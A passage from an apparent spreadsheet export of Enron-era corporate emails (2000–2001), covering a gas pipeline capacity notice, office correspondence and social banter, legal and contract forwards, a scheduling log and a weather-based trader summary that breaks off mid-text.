PAL Parks/Loan Paybacks  Not Available   *_x000D_
_x000D_
+ Call Gas Control 24 hours in advance at (304) 357-2606 to request approval._x000D_
_x000D_
Receipt capacity will be as follows:_x000D_
_x000D_
TENNESSEE:_x000D_
_x000D_
Brinker (B12)            20,000_x000D_
Broad Run (B9)          450,000_x000D_
Cambridge (B10)          10,000_x000D_
Dungannon (B11)          40,000_x000D_
Highland (B17)           25,000_x000D_
Milford (B18)            30,000_x000D_
North Greenwood (B22)    10,000_x000D_
Unionville (B15)         75,000_x000D_
_x000D_
TEXAS EASTERN:_x000D_
_x000D_
Delmont (C16)                 0_x000D_
Eagle (C22)              30,000_x000D_
Hooker (C9)              25,000_x000D_
Pennsburg (C23)          50,000_x000D_
Windridge (C12)          60,000_x000D_
_x000D_
NATIONAL FUEL:_x000D_
_x000D_
Independence (M1)        10,000_x000D_
Ellwood City (L1)        10,000_x000D_
_x000D_
TRANSCO:_x000D_
_x000D_
Downingtown (E3)          5,000_x000D_
Emporia I (E13)          80,000  *_x000D_
Rockville (E2)           65,000_x000D_
Dranesville (E1)         25,000_x000D_
_x000D_
ALGONQUIN:_x000D_
_x000D_
Ramapo (R1)              50,000_x000D_
_x000D_
ANR:_x000D_
_x000D_
Paulding/Cecil          100,000_x000D_
(F1, A2)_x000D_
_x000D_
LEBANON AGGREGATE       225,000_x000D_
(A4, F2, C4, D3)_x000D_
_x000D_
TOLEDO AGGREGATE        225,000_x000D_
(A3, F4, 734462)_x000D_
_x000D_
COLUMBIA GULF:_x000D_
(801)_x000D_
_x000D_
TCO-Leach             2,218,000_x000D_
_x000D_
Internal point non-firm capacity will be as follows:_x000D_
_x000D_
Lanham                No Restrictions_x000D_
_x000D_
Delivery capacity (non-firm) will be as follows:_x000D_
_x000D_
TRANSCO:_x000D_
_x000D_
Martins Creek (MA 21)    25,000_x000D_
Young Woman's Creek       5,000_x000D_
   (MA 36)_x000D_
_x000D_
ALGONQUIN:_x000D_
_x000D_
Hanover (MA 22)         143,000_x000D_
_x000D_
EQUITRANS:_x000D_
_x000D_
Fallen Timber (MA 35)    35,000_x000D_
(MLI K1)_x000D_
_x000D_
Waynesburg-Rhinehart     30,000_x000D_
(MA 26) (MLI K2)_x000D_
_x000D_
OPT-30 will be available in all market areas._x000D_
OPT-60 will be available in all market areas._x000D_
_x000D_
Market Area delivery capacity (non-firm) will be as follows:_x000D_
_x000D_
Operating Area 1_x000D_
     Market Area 33       No Restrictions_x000D_
     Market Area 34       No Restrictions_x000D_
_x000D_
Operating Area 2_x000D_
     Market Area 20       No Restrictions_x000D_
_x000D_
Operating Area 3_x000D_
     Market Area 15       No Restrictions_x000D_
     Market Area 16       No Restrictions_x000D_
     Market Area 17       No Restrictions_x000D_
     Market Area 18       No Restrictions_x000D_
     Market Area 19       No Restrictions_x000D_
_x000D_
Operating Area 4_x000D_
     Market Area 21       No Restrictions_x000D_
     Market Area 22       No Restrictions_x000D_
     Market Area 23       No Restrictions_x000D_
     Market Area 24       No Restrictions_x000D_
     Market Area 25       No Restrictions_x000D_
     Market Area 29       No Restrictions_x000D_
_x000D_
Operating Area 5_x000D_
     Market Area 02       No Restrictions_x000D_
     Market Area 07       No Restrictions_x000D_
_x000D_
Operating Area 6_x000D_
     Market Area 10       No Restrictions_x000D_
     Market Area 11       No Restrictions_x000D_
     Market Area 12       No Restrictions_x000D_
     Market Area 13       No Restrictions_x000D_
     Market Area 14       No Restrictions_x000D_
_x000D_
Operating Area 7_x000D_
     Market Area 01       No Restrictions_x000D_
     Market Area 03       No Restrictions_x000D_
     Market Area 04       No Restrictions_x000D_
     Market Area 05       No Restrictions_x000D_
     Market Area 06       No Restrictions_x000D_
     Market Area 08       No Restrictions_x000D_
     Market Area 09       No Restrictions_x000D_
_x000D_
Operating Area 8_x000D_
     Market Area 26       No Restrictions_x000D_
     Market Area 27       No Restrictions_x000D_
     Market Area 32       No Restrictions_x000D_
     Market Area 35       No Restrictions_x000D_
     Market Area 36       No Restrictions_x000D_
     Market Area 38       No Restrictions_x000D_
     Market Area 39       No Restrictions_x000D_
     Market Area 40       No Restrictions_x000D_
_x000D_
Operating Area 10_x000D_
     Market Area 28       No Restrictions_x000D_
     Market Area 30       No Restrictions_x000D_
     Market Area 31       No Restrictions_x000D_
_x000D_
If you have any questions, please contact your Account_x000D_
Representative.</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 05:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marisha.negovetich@ltgov.state.tx.us', 'veronica.cherry@awc-inc.com', 'jason.wolfe@enron.com', 'chris.guidroz@ctp.com'})</t>
  </si>
  <si>
    <t>FW: Home_Depot_Darwin</t>
  </si>
  <si>
    <t>-----Original Message-----_x000D_
From: Campbell, Pat [mailto:Pat.Campbell@Nextel.com]_x000D_
Sent: Thursday, December 28, 2000 12:12 PM_x000D_
To: 'Beth.Cherry@enform.com'; 'michael.Cherry@enform.com';_x000D_
'johnyels@msn.com'; 'johnyew@swbell.net'_x000D_
Subject: FW: Home_Depot_Darwin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Van Dyke, Trey_x000D_
Sent: Thursday, December 28, 2000 12:08 PM_x000D_
To: Campbell, Pat_x000D_
Subject: FW: Home_Depot_Darwin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Heringer, Dan_x000D_
Sent: Thursday, December 28, 2000 11:57 AM_x000D_
To: Grimm, Pepper; Van Dyke, Trey; 'dheringer@aol.com'_x000D_
Subject: Home_Depot_Darwin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - home_depot_darwin_.doc</t>
  </si>
  <si>
    <t>Fri, 30 Nov 2001 06:51:16 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: PAA Request Forms</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
	Fran, I have Shelley's approval on these.  Can we get them approved.  Thanks. Lynn_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Perry, Renee  _x000D_
Sent:	Thursday, November 29, 2001 4:17 PM_x000D_
To:	Blair, Lynn_x000D_
Subject:	PAA Request Forms_x000D_
_x000D_
_x000D_
Lynn,_x000D_
_x000D_
Attached are the PAA Request Forms from the North Team._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Renee_x000D_
_x000D_
   </t>
  </si>
  <si>
    <t>Wed, 12 Jan 2000 09:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Thursday night</t>
  </si>
  <si>
    <t xml:space="preserve">am i not good enough to be number one in your heart and in public?  are you _x000D_
ashamed of me?_x000D_
i'll be there tomorrow night, but only if you'll be there too._x000D_
_x000D_
e_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Lisa Gillette                           01/12/2000 05:21 PM_x000D_
	_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Thursday night  _x000D_
_x000D_
you are in my heart.  how do you like that one!  i'm afraid you wont think _x000D_
much of that.  so are you going?  i saw your roommate last night at memorial _x000D_
park_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Bass                           01/12/2000 05:07 PM_x000D_
	_x000D_
_x000D_
To: Lisa Gillette/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Thursday night  _x000D_
_x000D_
I though I was #1._x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Lisa Gillette                           01/12/2000 04:44 PM_x000D_
	_x000D_
_x000D_
To: Timothy Blanchard/HOU/EES@EES, Eric Bass/HOU/ECT@ECT, Susan M _x000D_
Scott/HOU/ECT@ECT, Nick Hiemstra/HOU/ECT@ECT, Chad Landry/HOU/ECT@ECT, Ilan _x000D_
Caplan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Matthew Lenhart/HOU/ECT@ECT, _x000D_
Christopher Coffman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Shanna _x000D_
Husser/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Misti Day/HOU/ECT@ECT, Benjamin _x000D_
Markey/HOU/ECT@ECT, Carrie Southard/HOU/ECT@ECT, Christa Winfrey/HOU/ECT@ECT, _x000D_
Brian Hoskins/HOU/ECT@ECT, Robert Norton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Bryan Hull/HOU/ECT@ECT, Hang Bui/HOU/ECT@ECT, Stephen _x000D_
Plauche/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Dan Feather/HOU/EES@EES, Heather _x000D_
Alon/HOU/ECT@ECT, Sheetal Patel/HOU/ECT@ECT, Kreg Hall/HOU/ECT@ECT, Mason _x000D_
Hamlin/HOU/ECT@ECT, Alicia Perkins/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Thursday night_x000D_
_x000D_
Hello Everyone,_x000D_
_x000D_
Woody's Place again on Richmond for Thursday night around 9pm.  Hope to see _x000D_
everyone there._x000D_
Let someone know of any objections._x000D_
_x000D_
LISA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 08:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'russell.ballato@enron.com', 'larry.jester@enron.com', 'larry.campbell@enron.com', 'miguel.garcia@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'jay.wills@enron.com', 'rudy.acevedo@enron.com', 'wayne.herndon@enron.com', 'joe.errigo@enron.com', 'greg.trefz@enron.com', 'chad.starnes@enron.com', 'dean.laurent@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'doug.miller@enron.com', 'keller.mayeaux@enron.com', 'joe.stepenovitch@enron.com', 'cyril.price@enron.com', 'jason.choate@enron.com'})</t>
  </si>
  <si>
    <t>Transfer an incoming call to " Voice Mail "</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kayne Coulter/HOU/ECT on 08/29/2000 03:14 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Steve Olinde@ENRON_x000D_
08/29/2000 02:58 PM_x000D_
To: Brent Hebert/HOU/ECT@ect, Keith Comeaux/Corp/Enron@Enron, Chris _x000D_
Lenartowicz/Corp/Enron@ENRON, George Diaz/Corp/Enron@ENRON, Justin _x000D_
Laverell/Corp/Enron@ENRON, Kayne Coulter/HOU/ECT@ECT, Lloyd Will/HOU/ECT@ECT, _x000D_
Mitch Robinson/Corp/Enron@Enron, Richard Broussard/Corp/Enron@Enron, _x000D_
Christopher Watts/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Transfer an incoming call to " Voice Mail "_x000D_
_x000D_
The procedure to connect an incoming call to " Voice Mail "_x000D_
_x000D_
1)  If you pick up a call on someone's line, and the person calling request _x000D_
to be connected to Voice Mail:_x000D_
_x000D_
      A)   Press the " T "  transfer  button._x000D_
      B)   Press * 99_x000D_
_x000D_
     The caller is now connected to Voice mail._x000D_
_x000D_
_x000D_
2)  If a person calls on a line other than the employees  line and is _x000D_
requesting to be connected to their Voice Mail :_x000D_
_x000D_
     A)   Press the " T " transfer button._x000D_
     B)   Dial 57001 and the employees extension number._x000D_
     C)   Press the release button._x000D_
_x000D_
     The caller is now connected to Voice Mail._x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 14:32:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cjewett@velaw.com'})</t>
  </si>
  <si>
    <t>frozenset({'mcash@ect.enron.com'})</t>
  </si>
  <si>
    <t>Georgia-Pacific Documents</t>
  </si>
  <si>
    <t>_x000D_
Michelle,_x000D_
 _x000D_
Hope you had a nice  and uninterrupted by work weekend.  I have a lot of Georgia-Pacific plan  documents that our due diligence person copies and brought back for me to look  at if we needed to.  Do you want them?  Can you think of any reason  why I should keep them if you don't?_x000D_
 _x000D_
Carol</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 08:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'andrew.edison@enron.com'})</t>
  </si>
  <si>
    <t>service of process</t>
  </si>
  <si>
    <t xml:space="preserve">Are you handling this?_x000D_
----- Forwarded by Richard B Sanders/HOU/ECT on 03/22/2001 04:08 PM -----_x000D_
_x000D_
	Becky Stephens/ENRON@enronXgate_x000D_
	03/20/2001 03:43 PM_x000D_
		 _x000D_
		 To: Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: Linda R Guinn/HOU/ECT@ECT, Bonnie White/ENRON@enronXgate, Andrew _x000D_
Edison/NA/Enron@Enron_x000D_
		 Subject: service of process_x000D_
_x000D_
The following documents, received today, have been forwarded for your _x000D_
immediate attention:_x000D_
_x000D_
MCNIC Pipeline &amp; Processing Company v. Crown Energy Corporation, Crown _x000D_
Asphalt Corporation, et al.; No. 1220024039, JAMS.  SUBPOENA DUCES TECUM and _x000D_
CHECK to Enron Capital &amp; Trade Resources Corp. by process server on 3/19/01._x000D_
_x000D_
PLEASE ADVISE IF YOU DO NOT RECEIVE WITHIN 1 BUSINESS DAY._x000D_
_x000D_
Thank you !!_x000D_
_x000D_
Becky A. Stephens_x000D_
Support Services Coordinator_x000D_
Enron Litigation Unit, EB4809_x000D_
713/853-5025_x000D_
713/853-6576 (fax)_x000D_
Becky.Stephens@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 10:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Commercials</t>
  </si>
  <si>
    <t xml:space="preserve">What design are you talking about?  Do I have pink elephants on all my emails _x000D_
or something?_x000D_
_x000D_
I'm very enthused that I have the skillset to be an advertising critic when I _x000D_
grow up.  It's something I've always wanted to do._x000D_
_x000D_
_x000D_
PS.  I'm a little sarcastic as well._x000D_
_x000D_
_x000D_
From: Margaret Allen@ENRON on 09/27/2000 01:45 PM_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Commercials  _x000D_
_x000D_
John, John, John....very impressive analysis!  The first two commercials were _x000D_
supposed to be idealistic spots announcing Enron as an innovative company, _x000D_
while the next four are proof points to our innovation by showing the _x000D_
businesses we have created. _x000D_
_x000D_
I know you were elated to get an email from me this morning, thus proving _x000D_
that I had not been kidnapped and all those important things I work on would _x000D_
continue to be completed.  Oh and that certainly is a pretty design you add _x000D_
to your emails.  Very masculine!  _x000D_
_x000D_
Smile, Margaret_x000D_
_x000D_
ps, i hope you can read my sarcasm over email -- if you knew me better, you _x000D_
would understand it completely since it is rare that i'm in a totally serious _x000D_
mood. hope you don't take offense!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	John Arnold@ECT_x000D_
	09/27/2000 12:29 PM_x000D_
		_x000D_
		 To: Margaret Allen/Corp/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: Commercials_x000D_
_x000D_
I really liked the commercials about specifics (i.e.  weather, EOL, _x000D_
bandwidth).  The metal man was definitely at a different philosophical level _x000D_
than where my brain operates.  Still not quite sure what was going on there.  _x000D_
Ode was a bit too idealistic.   The campaign in general was very different _x000D_
than previous.   But I guess you know that and that's the point.   Again, I _x000D_
think the commercials that showed why we are the most innovative were very _x000D_
impressive.  Just telling people we are innovative made less of an impact.  _x000D_
_x000D_
Sorry I ruined your run.  At least you weren't molested by the River Oaks car _x000D_
thief._x000D_
_x000D_
_x000D_
From: Margaret Allen@ENRON on 09/27/2000 08:24 AM_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Commercials  _x000D_
_x000D_
So, what did you think?!  Don't lie or stretch the truth either -- you won't _x000D_
hurt my feelings, I promise.  _x000D_
_x000D_
By the way, by the time I arrived home it was completely dark so I went for a _x000D_
three mile run this morning.  Not fun, but I'm definitely awake right now!  _x000D_
BUT, it's all your fault I couldn't go last night....he!he!_x000D_
_x000D_
Trade well, MSA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 03:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Attached are the online contracts._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Robert Bruce@ENRON_x000D_
	Sent by: Robert Bruce@ENRON_x000D_
	04/09/2001 10:46 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Sara Shackleton/HOU/ECT@ECT_x000D_
		 Subject: _x000D_
_x000D_
Tana, the products listed below (as I understand) comprise the initial _x000D_
products for the EOL roll-out.  It is unusual that ECTRIC, rather than ENA, _x000D_
will be the Enron party, even with respect to transactions that will be _x000D_
confirmed out of the U.S.  This is something Mark and I (as well as tax and _x000D_
credit) have scrubbed at length and approved._x000D_
_x000D_
_x000D_
Enron principal counterparty for each: ECTRIC_x000D_
Each product is a financially-settled swap (NO OPTIONS)_x000D_
_x000D_
(1) Coffee swap -- NYBOT reference price (executed by ECTRIC from Houston)_x000D_
(2) Coffee swap -- LIFFE reference price (executed by ECTRIC/EEFT from London)_x000D_
(3) Coffee basis swap -- NYBOT/LIFFE spread (executed by ECTRIC from Houston)_x000D_
(4) Sugar swap -- NYBOT reference price (executed by ECTRIC from Houston)_x000D_
(5) Sugar swap -- LIFFE reference price (executed by ECTRIC/EEFT from London)_x000D_
(6) Sugar basis swap -- NYBOT/LIFFE spread (executed by ECTRIC from Houston)_x000D_
(7) Cocoa swap -- NYBOT reference price (executed by ECTRIC from Houston)_x000D_
(8) Cocoa swap -- LIFFE reference price (executed by ECTRIC/EEFT from London)_x000D_
(9) Cocoa basis swap -- NYBOT/LIFFE spread (executed by ECTRIC from Houston)_x000D_
_x000D_
I will immediately look into whether there would be special restrictions for _x000D_
swaps on coffee, sugar and cocoa with respect to Australian, Singapore and _x000D_
Hong Kong counterparties (I think these are the three most likely non _x000D_
U.S./European jurisdictions at this point)_x000D_
_x000D_
_x000D_
_x000D_
Robert E. Bruce_x000D_
Senior Counsel_x000D_
Enron Wholesale Services_x000D_
T (713) 345-7780_x000D_
F (713) 646-3393_x000D_
robert.bruce@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 02:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'daren.j.farmer@enron.com', 'lbellamy@enron.com', 'janet_h_wallis@enron.com'})</t>
  </si>
  <si>
    <t>George W's new Limo</t>
  </si>
  <si>
    <t>Thought you might be able to appreciate a Limo. with style._x000D_
_x000D_
(See attached file: Bush-limo.jpg)_x000D_
_x000D_
 - Bush-limo.jpg</t>
  </si>
  <si>
    <t>Mon, 24 Jan 2000 07:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dhill@wrf.com'})</t>
  </si>
  <si>
    <t>Re: ENE</t>
  </si>
  <si>
    <t xml:space="preserve">See ENE today?  Glad I didn't quit my day job.  DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 01/24/2000 _x000D_
03:59 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Drew Fossum                           01/21/2000 03:31 PM_x000D_
	_x000D_
_x000D_
To: dhill@wrf.com_x000D_
cc:  _x000D_
_x000D_
Subject: Re: ENE  _x000D_
_x000D_
I wish.  As to your complaint about my failure to tip you off, there were two _x000D_
primary reasons:  (1) if I told you and got caught I'd go to prison, and, _x000D_
more importantly, (2) I had no clue. DF  (its better to be lucky than good!) _x000D_
_x000D_
_x000D_
_x000D_
dhill@wrf.com on 01/21/2000 02:58:19 PM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: ENE_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Yeah, I've noticed it.  Particularly the run-up yesterday.  Hell no, I_x000D_
don't own any ENE.  Why didn't you tell me this was going to happen?_x000D_
Between ENE and our good old EMC, you really are closing in on_x000D_
retirement....._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    Drew_Fossum@e_x000D_
                    nron.com             To:     DHill@wrf.com_x000D_
                                         cc:_x000D_
                    01/21/00             Subject:     ENE_x000D_
                    02:41 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Check out ENE over the last 30 days.  I'm a few more weeks away from_x000D_
retirement.  Do you own any?  DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 01:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: File Search:  ISDA:  ENA and Public Service Electric and Gas_x000D_
 Company 11/29/99</t>
  </si>
  <si>
    <t xml:space="preserve">Mary:_x000D_
I gave this file to Susan Fllynn.  There should have been a blue file made _x000D_
for it._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Mary Cook_x000D_
	08/28/00 04:25 PM_x000D_
		 _x000D_
		 To: Robert Bruce/NA/Enron@Enron, Mary Cook/HOU/ECT@ECT, Brent _x000D_
Hendry/NA/Enron@Enron, Jason Peters/Corp/Enron@Enron, Sara _x000D_
Shackleton/HOU/ECT@ECT, Carol St Clair/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, _x000D_
Susan Bailey/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron, Tana _x000D_
Jones/HOU/ECT@ECT, Brenda Whitehead/HOU/ECT@ECT, Chaundra Woods/HOU/ECT@ECT, _x000D_
Becky Tlucek/HOU/ECT@ECT, Kaye Ellis/HOU/ECT@ECT, Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: File Search:  ISDA:  ENA and Public Service Electric and Gas _x000D_
Company 11/29/99_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
Do you have this file?  It was last being worked by Flynn and St. Clair.  _x000D_
Thanks for looking.  Mary_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 03:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pat.jefferson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'douglas.dunn@enron.com', 'mark.haedicke@enron.com', 'jeff.donahue@enron.com', 'raymond.bowen@enron.com', 'rick.buy@enron.com', 'jeffrey.sherrick@enron.com', 'jere.overdyke@enron.com'})</t>
  </si>
  <si>
    <t>Invitation - Mariner 9:00am Board Meeting (13 Dec 08:30 AM CST)</t>
  </si>
  <si>
    <t>THIS MEETING HAS BEEN RESCHEDULED FROM 12/7/00 TO 12/13/00.  SAME TIME</t>
  </si>
  <si>
    <t>Sat, 15 Dec 2001 07:38:54 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 12/15/01; HourAhead hour: 6;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 12/15/01; HourAhead hour: 6;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001121506.txt</t>
  </si>
  <si>
    <t>Wed, 20 Jun 2001 09:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Glad to hear it!  I was really bummed I couldn't go to Colo.  Thanks to some _x000D_
good painkillers I'm feeling better now._x000D_
I want to see you next time you're in Houston!_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Dasovich, Jeff  _x000D_
Sent: Wednesday, June 20, 2001 4:28 PM_x000D_
To: Scott, Susan_x000D_
Subject: Re: _x000D_
_x000D_
Barely.  Missed you lots in Colorado.  You better?_x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Susan Scott/ENRON@enronXgate 06/20/2001 01:10 PM 	   To: Jeff _x000D_
Dasovich/NA/Enron@Enron  cc:   Subject: _x000D_
_x000D_
_x000D_
Are you alive?_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 08:19:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tradersummary@syncrasy.com'})</t>
  </si>
  <si>
    <t>Syncrasy Daily Trader Summary for Thu, Oct 25, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">=20_x000D_
[IMAGE]=09_x000D_
_x000D_
_x000D_
[IMAGE] [IMAGE][IMAGE][IMAGE][IMAGE][IMAGE][IMAGE][IMAGE]        Syncrasy, =_x000D_
LLC?   713.228.8470 Off  713.228.4147 Fax   909 Texas Avenue  Suite 1314  H=_x000D_
ouston, TX 77002         www.syncrasy.com          Sales:  713.228.4407   D=_x000D_
evelopment Offices:  970.247.4139 Off  970.247.7951 Fax   835 Main Avenue  =_x000D_
Suite 221  Durango, CO 81301      =09  =09 [IMAGE]    Complimentary version=_x000D_
 of Trader Summary  from Syncrasy, LLC and APB Energy Inc.    - If you woul=_x000D_
d like to receive this product early in the morning       please call Syncr=_x000D_
asy at 713 228 4407 for more information       or send an email to subscrib=_x000D_
e_TraderSummary@syncrasy.com     - If you would like to be added to this da=_x000D_
ily email list       please send an email to TraderSummaryemail@syncrasy.co=_x000D_
m     - If you would like to be removed from this daily email       please =_x000D_
reply to this email with the words "CANCEL" or send an email to cancel_trad=_x000D_
ersummary@syncrasy.com       Data last updated: Thursday, Oct 25, 2001 at 1=_x000D_
0:29AM ET    Commentary last updated: Thursday, Oct 25, 2001 at 09:51AM ET =_x000D_
 Meteorologist: Andy Weingarten... APB Energy/ True Quote     Congratulatio=_x000D_
ns Andy Weingarten, APB Energy!  Winner of the $50,000 Winter 2000-01 AQUIL=_x000D_
A/AMS Seasonal Forecasting Competition. For more information please visit: =_x000D_
AMS  or Aquila    Click here for a definition of 'Average-Daily Maximum Tem=_x000D_
perature'     Today: Thursday, October 25, 2001   Syncrasy's Choice:  Delta=_x000D_
 Temp.   Volatility Matrix    [IMAGE][IMAGE]  [IMAGE][IMAGE]  [IMAGE][IMAGE=_x000D_
]    [IMAGE]   ECAR(CTR) 54 +2 ERCOT(SP) 79 +4 FRCC(SE) 85 -1 MAAC(NE) 71 +=_x000D_
2 MAIN(CTR) 48 -2 MAPP(HP) 41 -2 NPCC(NE) 67 +3 SERC(SE) 77 +2 SPP(SP) 64 N=_x000D_
C WSCC(NW) 54 -2 WSCC(RK) 52 -1 WSCC(SW) 75 NC     Range Standard Deviation=_x000D_
 [IMAGE] [IMAGE]   Reg CT HP NE NW RK SE SP SW Mean 43 44 63 51 49 73 71 73=_x000D_
 Max 49 52 67 55 55 79 78 78 Min 38 36 61 47 39 69 61 68 Range 11 16 6 8 16=_x000D_
 10 17 10 StD-P 2.4 3.9 2.1 2.5 4.8 3.5 4.8 2.8 Count 10 10 10 10 10 10 10 =_x000D_
10    Day 1-5 Discussion:   Powerhouse storm is about to exit. The coldest =_x000D_
air of the season is about to enter. A significant warm up will commence la=_x000D_
te in the period.  The "storm of the century", "Superstorm", or whatever yo=_x000D_
u want to call yesterdays event was over-hyped a bit in my opinion, but sig=_x000D_
nificant in some respects. There were some large tornadoes in Northern Indi=_x000D_
ana and the surface low pressure center had one of the lowest readings I ha=_x000D_
ve seen in an October storm. Otherwise, it was a squall line of t-storms wi=_x000D_
th a turn to colder and windier weather, things we have certainly seen befo=_x000D_
re and will see again. The cold front should reach the Atlantic coastline l=_x000D_
ater today and another line of t-storms may certainly go up along it. We al=_x000D_
so have some measurable snow in Minnesota this morning and could see "some"=_x000D_
 lake effect snows! through Friday. Once this storm is off the field, the o=_x000D_
nly inclement weather threats appear to be the PNW from a trough in the Gul=_x000D_
f of Alaska and in Florida from something tropical. I do not mean from a na=_x000D_
med storm or hurricane, but merely that the disturbance originated in the C=_x000D_
aribbean. A large polar air mass has swept in behind this storm insuring a =_x000D_
drier and cooler than normal pattern from the Mississippi River and East th=_x000D_
rough the weekend. The Plains start to warm early next week is ridging star=_x000D_
ts to evolve in response to troughing off the West Coast. Neither of these =_x000D_
features look particularly strong in the short term and overall weather in =_x000D_
the West has a benign look to it.  Tomorrow: Friday, October 26, 2001   Syn=_x000D_
crasy's Choice:  Delta Temp.   Volatility Matrix    [IMAGE][IMAGE]  [IMAGE]=_x000D_
[IMAGE]  [IMAGE][IMAGE]    [IMAGE]   ECAR(CTR) 44 -1 ERCOT(SP) 76 +1 FRCC(S=_x000D_
E) 76 +1 MAAC(NE) 52 NC MAIN(CTR) 48 NC MAPP(HP) 42 NC NPCC(NE) 49 -1 SERC(=_x000D_
SE) 65 -1 SPP(SP) 66 NC WSCC(NW) 61 +1 WSCC(RK) 60 +2 WSCC(SW) 76 +1     Ra=_x000D_
nge Standard Deviation [IMAGE] [IMAGE]   Reg CT HP NE NW RK SE SP SW Mean 4=_x000D_
0 47 46 57 55 63 69 73 Max 47 58 50 61 63 70 78 77 Min 35 38 41 52 44 56 58=_x000D_
 68 Range 12 20 9 9 19 14 20 9 StD-P 2.8 5.1 2.5 2.8 5.8 3.8 5.3 2.8 Count =_x000D_
10 10 10 10 10 10 10 10   Day 3: Saturday, October 27, 2001   Syncrasy's Ch=_x000D_
oice:  Delta Temp.   Volatility Matrix    [IMAGE][IMAGE]  [IMAGE][IMAGE]  [=_x000D_
IMAGE][IMAGE]    [IMAGE]   ECAR(CTR) 44 +1 ERCOT(SP) 75 +1 FRCC(SE) 69 -2 M=_x000D_
